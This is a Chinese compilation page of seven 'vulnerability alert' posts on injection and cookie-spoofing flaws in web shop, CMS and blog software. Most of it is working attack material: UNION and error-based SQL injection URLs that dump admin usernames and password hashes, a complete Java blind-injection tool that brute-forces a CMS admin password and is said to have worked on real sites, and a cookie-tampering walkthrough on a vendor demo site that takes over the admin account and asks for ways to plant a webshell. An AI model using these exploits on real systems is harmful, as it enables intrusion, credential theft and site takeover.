“MoverH”通过精心收集,向本站投稿了7篇Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警,以下是小编帮大家整理后的Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警,仅供参考,欢迎大家阅读。
- 目录
篇1:Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警
Shopv8 商城系统 v12.07,程序下载:www.mycodes.net/20/1099.htm
漏洞文件:list.asp
127.0.0.1/list.asp?id=338
注入中转爆帐号密码
127.0.0.1:808/jmCook.asp?jmdcw=338%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,password,username,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52%20from%20admin
测试的时候关闭js脚本,不然会跳转的,
Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警
,
转自:www.90sec.org/thread-2883-1-1.html
篇2:mvmmall网店商城系统注入漏洞漏洞预警
mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上,
代码如下:
require_once ‘include/common.inc.php’;
require_once ROOTPATH.’header.php’;
if($action!=’search’){
$search_key = ”;
if (isset($ps_search))
{ //省略一堆东西
$tag_ids = array; //在if里
//继续省略
while ($row = $db->fetch_array($result)) {
$tag_ids[] = $row['goods_id'];
} //也是在if里
}
//省略一堆东西
} //结束if里的东西
//商品标签搜索
$tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入
$tag_search = implode(‘,’,dhtmlchars($tag_ids)); //dhtmlchars过滤HTML标签不用理会
$tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了!
//省略无关东西
$search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的….
$total_count = $db->counter($mvm_goods_table,$search_sql);
用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了,
测试EXP:
www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
BY:www.dj4now.com/
篇3:ACTCMS注入漏洞漏洞预警
一款ASP的CMS程序,用的人并不是太多。
GOOGLE一下关键字“Copyright @ www.actcms.com” ,不是太多。
今天看了一下代码。
基本上所有的参数全都被过滤掉了。。
不过投票那里出了点小问题。。
在/plus/vote/vote.asp页面。
代码如下:
ASP/Visual Basic代码
....
if request(“voted”).count=0 then
response.write “”
response.end
end if
for i=1 to request(“voted”).count
actcms.actexe(“Update vote_act set VoteNum=VoteNum+1 where id=”&request(“voted”)(i))
next
....
response.Redirect “index.asp?id=”&id&“”
id直接从request里面取的,不过因为前面是update ,再加上后面的response.redirect,利用起来比较麻烦。而且这是一个一般工具无法识别的注入点。因为无论我们构造什么语句在后面,它都会跳到index.asp页面。
唯一有变化的就是当我们构造的注入条件正确的时候,票数会增加。 手工利用起来相当的麻烦,试了现在的那些注入工具明小子,pangolin之类的也不能注入,所以我自己动手写了一个简单的程序 ,因为只会JAVA,所以就用JAVA写了。。写的比较粗糙。用的穷举法,这样写着比较方便。速度慢就慢吧。
代码如下:
Java代码
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class ActCmsGetPwd {
public static char[] arr = { '0', '1', '2', '3', '4', '5', '6', '7', '8',
'9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',
'z' };
public static String siteurl = “”;
public static int voteid = 1;
public static String charset = “”;
public static void main(String[] args) throws Exception {
if (args.length < 4) {
System.out
.println(“usage:java ActCmsGetPwd System.out.println(“siteurl:目标站点”); System.out.println(“voteid:投票id”); System.out .println(“totalVoteNum:当前的投票人数,请自行查看plus/vote/index.asp?id= System.out.println(“charset:目标站点所用的ACTCMS的字符集,请自行查看网页源代码”); System.out.println(“eg:java ActCmsGetPwd www.abc.com/ 1 15 gb2312”); return; } siteurl = args[0]; voteid = Integer.parseInt(args[1]); int preVoteNum = Integer.parseInt(args[2]); charset = args[3]; System.out.println(“Code by Ninty , QQ 3191864”); System.out.print(“password is :”); for (int i = 1; i <= 16; i++) { System.out.print(send(i, 0, preVoteNum)); preVoteNum++; } System.out.println(“nDone!”); } public static char send(int a, int b, int preVoteNum) throws Exception { String sql = “%20and%20(select%20top%201%20mid(password,” + a + “,1)%20from%20admin_act%20where%20supertf%20=1)%20=%20'” + arr[b] + “'”; URL u = new URL(siteurl + “/Plus/vote/vote.asp?dopost=send&id=”+voteid+“&ismore=0&voted=3” + sql); URLConnection conn = u.openConnection(); BufferedReader reader = new BufferedReader(new InputStreamReader(conn .getInputStream(),charset)); String str = reader.readLine(); while (str != null) { if (str.indexOf(“ 投票人数:”) != -1) { break; } str = reader.readLine(); } reader.close(); if (!isRight(str, preVoteNum)) { return send(a, ++b, preVoteNum); } else { return arr[b]; } } public static boolean isRight(String str, int preVoteNum) { if (str == null) { System.out.println(“无法读取!”); System.exit(0); } Pattern pat = Pattern.compile(“人数:(d+)”); Matcher mat = pat.matcher(str); if (mat.find()) { int num = Integer.parseInt(mat.group(1)); if (num != preVoteNum) { return true; } } return false; } }
下面是已经编译好的 class文件,编译环境JDK6,
直接运行就好。
actcmsgetpwd.class
在网上找了几个站测试了一下,都可以得到超级管理员的密码,不过官网好像不存在这个漏洞。
篇4:XPSHOP商城系统Cookies欺骗漏洞漏洞预警
文章作者:121711090
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..
这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...
但为了我们的网络更安全..还是看看吧...
首先先看看这个站吧:demo1.xpshop.cn/
先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704
好..还是用啊D打开网站比较好..看截图:记得要保留cookies
之后便看看他的Cookies...
代码:
LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14
我们改一下这两个值:LoginCode=0684;mid=14 .......都改成1 :
代码:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1
点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..
之后就成这样了:
当然..也有可能没有..那我们就要改一下:“ASP.NET_SessionId=” 这个值就好了..随便改一个字就行:如下:
代码:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1
好了..现在再看看会员信息:
是不是有一个“找回密码答案:”呵.....个位都想到了吧..直接就能改管理员密码了..
demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..
如下图:
成功.....demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..
可是我一直没弄成..理论是只有这样才行..看..
先插马..再备份..但这里出错了..
还望达人能想出更好的办法..
我想了一晚上了....没辙了....
demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 这可以列目录
好..就那么多了....有哪位达人弄出好办法了..千万别望了告诉我呀...联系方式:blog.sina.com.cn/qq1217
demo1.xpshop.cn/helps/t.txt
添加flash广告处可直接上传马
营销管理 - flash广告添加
篇5:WordPress 3.1.3 注入漏洞漏洞预警
get_terms过滤器文件中声明taxonomy.php 没有正确验证用户输入,允许攻击者构建任意sql命令,可用于盲注,
以下网址可用于执行SQL盲注攻击
[SQL injection] sql注入
localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
第二个:
get_bookmarks()函数中声明的
bookmark.php文件没有正确验证用户输入
这个也可以盲注
以下网址可用于执行SQL盲注攻击
localhost/wp-admin/link-manager.php?orderby=[SQLinjection]&order=[SQL injection]
WordPress已经确认漏洞存在了
漏洞解决:
升级到3.1.4 或者 3.2-RC3版本,
篇6:iGiveTest 2.1.0注入漏洞漏洞预警
Version: <= 2.1.0
# Homepage: iGiveTest.com/
谷歌关键字: “Powered by iGiveTest”
随便注册一个帐号,
iGiveTest 2.1.0注入漏洞漏洞预警
,
然后暴管理员帐号和密码
www.xxxx.com/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
篇7:simplelog v1.3.1 注入漏洞漏洞预警
Simple-Log是基于PHP+MySQL的开源免费博客系统,系统轻巧运行速度飞快并具有很好的可扩展性.
程序下载down.cnzz.cn/Info/57357.aspx
----------------------------------------------
刚买到vps,打算装个blog系统,看到simple-log比较简洁,就下了最新的装了,,
simplelog v1.3.1 注入漏洞漏洞预警
,
谁知道,偶刚装好,到前台看到搜索就搜了下,没想到真有洞,urldecode()惹的祸。
试了下,真可以爆啊,无语了。
再上一张图吧,数据依然可以爆掉。
★ Andys PHP Knowledgebase 0.95.4 SQL注入漏洞及修复
★ 漏洞整改报告
★ ewebeditor(PHP) Ver 3.8 任意文件上传0day漏洞预警
★ 永久网络个人音乐盒LajoxBox v1.1上传漏洞利用漏洞预警
Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警(精选7篇)




